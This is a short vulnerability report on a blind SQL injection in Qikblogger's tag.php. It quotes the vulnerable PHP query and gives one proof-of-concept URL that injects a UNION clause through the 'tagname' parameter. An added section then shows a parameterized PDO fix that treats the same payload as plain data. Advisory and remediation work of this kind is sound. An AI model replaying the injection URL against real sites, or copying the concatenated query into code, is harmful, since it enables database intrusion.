
22.12.2009, 13:43
Qikblogger (qb-krypton-0.9beta-patched)
http://qikblogger.sourceforge.net
Blind SQL
mq=off
tag.php
PHP code:
if ( isset($_GET['blog_name']) && isset($_GET['tagname']) ) {
    $blog_name = trim($_GET['blog_name']);
    $tagname = trim($_GET['tagname']);
    ...
    $post_ids = $b->get_tag_posts($tagname);
blogs.php
PHP code:
function get_tag_posts($tagname)
if ( $db->query("SELECT tags.post_id as ids FROM tags, posts WHERE tags.tagname='$tagname' AND tags.blog_name='$this->blog_name' AND tags.post_id=posts.post_id AND posts.disp_dt < CURRENT_TIMESTAMP() ORDER BY posts.disp_dt DESC ;") ) {
http://localhost/qb/tag.php?blog_name=barbie&tagname=barbie'+union+select+1+--+1
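
A parameterized counterpart to the get_tag_posts() query above, as an added example that is not part of the original post or of Qikblogger's code. It assumes PDO with an in-memory SQLite database instead of the application's own $db wrapper, so the page's CURRENT_TIMESTAMP() is written as SQLite's CURRENT_TIMESTAMP; the function name get_tag_posts_bound, the schema, the rows and the 64-character limit are constructed for illustration.

```php
<?php
// Added example, not Qikblogger code. Assumes PDO with the SQLite driver so it
// runs offline; the schema and rows below are constructed for the demo.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE posts (post_id INTEGER PRIMARY KEY, disp_dt TEXT)");
$pdo->exec("CREATE TABLE tags (post_id INTEGER, tagname TEXT, blog_name TEXT)");
$pdo->exec("INSERT INTO posts VALUES (1, '2009-01-01 00:00:00'), (2, '2009-06-01 00:00:00')");
$pdo->exec("INSERT INTO tags VALUES (1, 'barbie', 'barbie'), (2, 'barbie', 'barbie')");

// Hypothetical replacement for get_tag_posts(): same query shape, but the tag
// and blog name travel as bound parameters and never become part of the SQL text.
function get_tag_posts_bound(PDO $pdo, string $blog_name, string $tagname): array
{
    // Reject values that cannot be a tag before touching the database
    // (the 64-character limit is an assumed policy, not the project's).
    if ($tagname === '' || strlen($tagname) > 64) {
        return [];
    }
    $stmt = $pdo->prepare(
        "SELECT tags.post_id AS ids FROM tags, posts
         WHERE tags.tagname = :tagname AND tags.blog_name = :blog_name
           AND tags.post_id = posts.post_id
           AND posts.disp_dt < CURRENT_TIMESTAMP
         ORDER BY posts.disp_dt DESC"
    );
    $stmt->execute([':tagname' => $tagname, ':blog_name' => $blog_name]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// A normal tag lookup.
var_dump(get_tag_posts_bound($pdo, 'barbie', 'barbie'));
// The tagname value from the report's URL, passed as data: the quote and the
// UNION keyword are compared as part of one literal string, not parsed as SQL.
var_dump(get_tag_posts_bound($pdo, 'barbie', "barbie' union select 1 -- 1"));
```

With bound parameters the query no longer depends on the magic_quotes setting the report notes as off.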